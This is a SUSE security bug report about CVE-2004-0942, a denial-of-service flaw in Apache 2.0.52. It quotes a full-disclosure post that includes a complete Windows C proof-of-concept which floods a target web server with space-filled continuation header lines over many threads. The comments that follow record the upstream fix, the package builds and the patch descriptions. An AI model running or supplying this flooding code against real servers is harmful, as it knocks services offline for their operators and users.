Bug 62967 (CVE-2004-0942)

Summary: VUL-0: CVE-2004-0942: Apache2 DoS
Product: [Novell Products] SUSE Security Incidents Reporter: Ludwig Nussel <lnussel>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: security-team
Version: unspecified   
Target Milestone: ---   
Hardware: All   
OS: Linux   
Whiteboard: CVE-2004-0942: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: patchinfo files for 8.1, 8.2, 9.0, 9.1, 9.2 and SLES9

Description Ludwig Nussel 2004-11-05 17:46:49 UTC 
We received the following report via full-disclosure.
The issue is public.

Not a very efficient DoS, one needs to send huge amounts of data:
http://www.apacheweek.com/features/security-20
CAN-2004-0942

Date: Mon, 1 Nov 2004 15:27:42 +0530
From: Chintan Trivedi <chesschintan@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] DoS in Apache 2.0.52 ?

Hi,

      I was doing some testing on Apache webserver ver 2.0.52 (unix) and
previous versions. Just found that a special type of request consumes
lot of CPU usage and hangs the webserver. It even hangs other services
like ssh, ftp ..

For Apache 2.0.52 a request like
GET / HTTP/1.0\n
[space] x 8000\n
[space] x 8000\n
[space] x 8000\n
.
.
8000 times

consumes a lot of cpu.

I created 25 threads (connections) and send the above request to one
webserver. After just 2-3 minutes of flooding, the server wasnt able
to fulfill any http requests.  Even ssh and such other services well
also hanged up. The time required for the attack was just maximum 5
minutes. 

I am not sure whether it is a valid DoS or not. Replacing the <space>
with any other char will break the connection just after a few
lines(130 or so) of header. Checking the
httpd-2.0.52/server/protocol.c file i see the code for the mime
headers. It checks for the first char of the header. If it is a "space" it
considers it as an extension to the previous line header.  The problem
seems to be similar to the advisory published by Guninsky few weeks
ago -> http://www.guninski.com/httpd1.html thought its a bit
different.  That fix was for the long request field header when the
header line is extended in the next line using space.

Well i guess 8K limit for the number of headers filled with spaces is
quite huge. Its enuf to DoS the server using a few threads.

You can check the attached C file to test it. The file is compiled on
windows system using VC++ 6.0.

-----------------POC----------------------------
///   Apache 2.0.52 and earlier  DoS  

#include "stdafx.h"
#include "winsock.h"
#include "string.h"
#include "stdio.h"
#include "windows.h"
#pragma comment(lib,"ws2_32")

DWORD WINAPI attack(LPVOID);
char target[256];

int main(int argc, char* argv[])
{
       int l=0;
       int j;
       DWORD dw;
       HANDLE hd;
       if(argc<2)
       {
               printf("usage: %s target", argv[0]);
               exit(0);
       }

       strncpy(target, argv[1], 256);
       printf("Attaching %s ...\n", target);
       for(j=0;j<50;j++)
               hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);

       for(j=0;j<50;j++)
               WaitForSingleObject(hd, INFINITE);

       printf ("done");
       return 0;
}

DWORD WINAPI attack(LPVOID l)
{
       int                             s;
       SOCKADDR_IN             sck;
       HOSTENT                 *host;
       char                    buff[256];
       char                    space[8000];
       int                             i;

       WSADATA                 wsadata;

       WSAStartup(MAKEWORD(1,1),&wsadata);

       memset(space, ' ', 8000);
       space[7998]='\n';
       space[7999]='\0';

       if((host=gethostbyname(target))==NULL)
       {
               printf("Host not found");
               return -1;
       }
       sck.sin_family = PF_INET;
       memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
       sck.sin_port = htons(80);

       if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
       {
               printf("Socket couldn't be initiallized");
               return -1;
       }
       if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
       {
               printf("Couldn't connect");
               return -1;
       }

       sprintf(buff, "GET / HTTP/1.0\n");
       //printf("%s",buff);
       int len=strlen(buff);

       if((send(s,buff,len,0))==-1)
       {
               printf ("send error");
               closesocket(s);
               return -1;
       }

       for(i=0;i<9999;i++)
       {

               if((send(s,space,strlen(space),0))==-1)
               {
                       printf("Send Error on header number %d", i);
                       closesocket(s);
                       return -1;
               }

       }
       closesocket(s);
       return 0;
}
------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Comment 1 Peter Poeml 2004-11-08 21:27:29 UTC 
Fixed in 2.0.53-dev, patch available in 2.0 CVS:
http://cvs.apache.org/viewcvs.cgi/httpd-2.0/server/protocol.c?r1=1.158&r2=1.159
Comment 2 Peter Poeml 2004-11-09 02:26:17 UTC 
Packages submitted to autobuild:

/work/SRC/old-versions/8.1/all/apache2 -> /work/src/done/8.1
/work/SRC/old-versions/8.2/all/apache2 -> /work/src/done/8.2
/work/SRC/old-versions/9.0/all/apache2 -> /work/src/done/9.0
/work/SRC/old-versions/9.1/BETA/all/apache2 -> /work/src/done/SLES9-SP1
/work/SRC/old-versions/9.1/SLES/all/apache2 -> /work/src/done/9.1
/work/SRC/old-versions/9.2/all/apache2 -> /work/src/done/9.2
plus STABLE.

-------------------------------------------------------------------
Mon Nov  8 19:18:52 CET 2004 - poeml@suse.de

- security fix [CAN-2004-0942 (cve.mitre.org)]: Fix for memory
  consumption DoS [#47967]
- security fix [CAN-2004-0885 (cve.mitre.org)]: fix SSLCipherSuite
  bypass in mod_ssl [#47117]

-------------------------------------------------------------------
Comment 3 Michael Schröder 2004-11-09 22:45:56 UTC 
Patchinfos?
Comment 4 Peter Poeml 2004-11-09 23:00:33 UTC 
I'll attach and submit them shortly.
Comment 5 Ludwig Nussel 2004-11-09 23:07:29 UTC 
thanks. /me cancels context switch ;)
Comment 6 Peter Poeml 2004-11-09 23:23:00 UTC 
Created attachment 25920 [details]
patchinfo files for 8.1, 8.2, 9.0, 9.1, 9.2 and SLES9

poeml@aust ~/tmp % tar tvzf patchinfos-apache2.tar.gz
drwxr-xr-x poeml/suse	     0 2004-11-09 16:18:48 patchinfos-apache2/
-rw-r--r-- poeml/suse	  1071 2004-11-09 16:17:27
patchinfos-apache2/patchinfo.apache2.box.81
-rw-r--r-- poeml/suse	  1070 2004-11-09 16:17:32
patchinfos-apache2/patchinfo.apache2.box.82
-rw-r--r-- poeml/suse	  1098 2004-11-09 16:17:45
patchinfos-apache2/patchinfo.apache2.box.90
-rw-r--r-- poeml/suse	  1066 2004-11-09 16:17:51
patchinfos-apache2/patchinfo.apache2.box.91
-rw-r--r-- poeml/suse	  1066 2004-11-09 16:18:21
patchinfos-apache2/patchinfo.apache2.box.92
-rw-r--r-- poeml/suse	   839 2004-11-09 16:18:48
patchinfos-apache2/patchinfo.apache2.sles

DESCRIPTION:
An issue allowing a remote Denial of Service attack has been fixed (the request

field length limit was not enforced for certain malicious requests). A
vulnerability in the mod_ssl module has been fixed (bypass of the
"SSLCipherSuite" directive, when configured in directory or location context).
CAN-2004-0942 and CAN-2004-0885 have been assigned to these issues.
DESCRIPTION_DE:
Bei bestimmten Requests wurden Beschraenkungen von zu langen Kopfzeilen nicht
angewendet, was zu entsprechendem Speicherverbrauch des Servers fuehren konnte
und damit entfernten Angreifern einen Denial of Service-Angriff erlaubte.
Aussedem wurde eine Schwachstelle im mod_ssl Modul behoben (Aushebeln der
"SSLCipherSuite"-Direktive, wenn sie im in einem Directory- oder Location
Kontext verwendet wurde). Die Kennungen CAN-2004-0942 und CAN-2004-0885 wurden
diesen Schwachstellen zugewiesen.
Comment 7 Peter Poeml 2004-11-09 23:24:09 UTC 
I assign to security-team for further processing
Comment 8 Thomas Biege 2004-11-19 23:02:33 UTC 
approved
Comment 9 Thomas Biege 2009-10-13 19:58:46 UTC 
CVE-2004-0942: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)